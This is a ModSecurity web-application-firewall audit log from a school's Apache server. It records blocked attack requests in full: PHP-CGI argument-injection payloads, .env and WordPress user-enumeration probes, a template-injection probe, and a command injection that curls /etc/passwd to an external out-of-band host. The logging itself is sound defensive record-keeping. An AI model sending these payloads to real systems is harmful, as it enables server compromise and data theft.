ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748376907407863 3649 (- - -) Stopwatch2: 1748376907407863 3649; combined=2356, p1=479, p2=1847, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dceee7b-Z-- --8784ad26-A-- [28/May/2025:03:15:08 +0700] aDYdTFuSH_Spa4YU2ZnKmQAAAMA 103.236.140.4 55900 103.236.140.4 8181 --8784ad26-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868962 --8784ad26-C-- --8784ad26-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8784ad26-E-- --8784ad26-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376908390395 3918 (- - -) Stopwatch2: 1748376908390395 3918; combined=2063, p1=473, p2=1560, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8784ad26-Z-- --62a8ad35-A-- [28/May/2025:03:17:55 +0700] aDYd8xLFq2VRfSzm6b82GQAAAIs 103.236.140.4 58656 103.236.140.4 8181 --62a8ad35-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.94.253 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.94.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --62a8ad35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a8ad35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748377075986881 828 (- - -) Stopwatch2: 1748377075986881 828; combined=346, p1=299, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a8ad35-Z-- --6cd99c47-A-- [28/May/2025:03:47:24 +0700] aDYk3A3r-0gDryHAyD-D4QAAAEA 103.236.140.4 33806 103.236.140.4 8181 --6cd99c47-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169083749 --6cd99c47-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0qa44pgpeoi1bmoheagknfrpdomc5goh.oast.live) --6cd99c47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cd99c47-E-- --6cd99c47-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748378844742604 2609 (- - -) Stopwatch2: 1748378844742604 2609; combined=720, p1=459, p2=231, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cd99c47-Z-- --44fa3c2f-A-- [28/May/2025:03:49:31 +0700] aDYlW_nnEwDNUSjDseLRtQAAAJI 103.236.140.4 35834 103.236.140.4 8181 --44fa3c2f-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 166.108.197.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 166.108.197.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/7.0.0 Safari/700.13 Proxy-Connection: close --44fa3c2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44fa3c2f-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748378971945812 2439 (- - -) Stopwatch2: 1748378971945812 2439; combined=1021, p1=457, p2=533, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44fa3c2f-Z-- --e5b2281d-A-- [28/May/2025:03:51:56 +0700] aDYl7BwBHP_x2VCWa040rAAAAMs 103.236.140.4 38158 103.236.140.4 8181 --e5b2281d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.251.34.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.251.34.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e5b2281d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5b2281d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748379116057647 3134 (- - -) Stopwatch2: 1748379116057647 3134; combined=1473, p1=498, p2=944, p3=0, p4=0, p5=31, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5b2281d-Z-- --cdf05942-A-- [28/May/2025:03:57:11 +0700] aDYnJw3r-0gDryHAyD-GhAAAAFY 103.236.140.4 43200 103.236.140.4 8181 --cdf05942-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.192.30.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.192.30.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cdf05942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdf05942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748379431427036 3348 (- - -) Stopwatch2: 1748379431427036 3348; combined=1524, p1=538, p2=950, p3=0, p4=0, p5=36, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdf05942-Z-- --e0a0d24b-A-- [28/May/2025:04:08:48 +0700] aDYp4A3r-0gDryHAyD-I5wAAAEI 103.236.140.4 54282 103.236.140.4 8181 --e0a0d24b-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162479266 --e0a0d24b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0a0d24b-E-- --e0a0d24b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748380128943637 2987 (- - -) Stopwatch2: 1748380128943637 2987; combined=1141, p1=458, p2=651, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0a0d24b-Z-- --9b11e13e-A-- [28/May/2025:04:12:07 +0700] aDYqpw3r-0gDryHAyD-J3wAAAEs 103.236.140.4 57396 103.236.140.4 8181 --9b11e13e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162480094 --9b11e13e-C-- --9b11e13e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b11e13e-E-- --9b11e13e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748380327402151 3660 (- - -) Stopwatch2: 1748380327402151 3660; combined=2202, p1=461, p2=1709, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b11e13e-Z-- --d70ce97a-A-- [28/May/2025:04:12:08 +0700] aDYqqOszXCullgn3bbFh8wAAAAE 103.236.140.4 57416 103.236.140.4 8181 --d70ce97a-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168873572 --d70ce97a-C-- --d70ce97a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d70ce97a-E-- --d70ce97a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748380328411759 4239 (- - -) Stopwatch2: 1748380328411759 4239; combined=2274, p1=488, p2=1755, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d70ce97a-Z-- --0b9de845-A-- [28/May/2025:04:12:09 +0700] aDYqqQ3r-0gDryHAyD-J5QAAAFg 103.236.140.4 57436 103.236.140.4 8181 --0b9de845-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162480109 --0b9de845-C-- --0b9de845-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b9de845-E-- --0b9de845-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748380329393091 4226 (- - -) Stopwatch2: 1748380329393091 4226; combined=2209, p1=495, p2=1681, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b9de845-Z-- --ef9b5637-A-- [28/May/2025:04:12:10 +0700] aDYqqhwBHP_x2VCWa044CwAAAM8 103.236.140.4 57456 103.236.140.4 8181 --ef9b5637-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168873587 --ef9b5637-C-- --ef9b5637-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef9b5637-E-- --ef9b5637-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748380330393533 3738 (- - -) Stopwatch2: 1748380330393533 3738; combined=1968, p1=456, p2=1484, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef9b5637-Z-- --4ec09526-A-- [28/May/2025:04:35:43 +0700] aDYwL_nnEwDNUSjDseLcjQAAAJc 103.236.140.4 51398 103.236.140.4 8181 --4ec09526-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.183.67.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.183.67.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4ec09526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ec09526-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748381743911526 5033 (- - -) Stopwatch2: 1748381743911526 5033; combined=2539, p1=689, p2=1790, p3=0, p4=0, p5=60, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ec09526-Z-- --879cc304-A-- [28/May/2025:04:45:00 +0700] aDYyXA3r-0gDryHAyD-QuAAAAFM 103.236.140.4 59468 103.236.140.4 8181 --879cc304-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.77.62.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.77.62.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --879cc304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --879cc304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748382300976941 3533 (- - -) Stopwatch2: 1748382300976941 3533; combined=1430, p1=477, p2=921, p3=0, p4=0, p5=31, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --879cc304-Z-- --aeac2718-A-- [28/May/2025:04:52:15 +0700] aDY0Dw3r-0gDryHAyD-SZgAAAFU 103.236.140.4 37582 103.236.140.4 8181 --aeac2718-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166182756 --aeac2718-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0qa44pgpeoi1bmoheagzou6deo3np7ix.oast.live) --aeac2718-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeac2718-E-- --aeac2718-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748382735717884 2396 (- - -) Stopwatch2: 1748382735717884 2396; combined=808, p1=478, p2=300, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 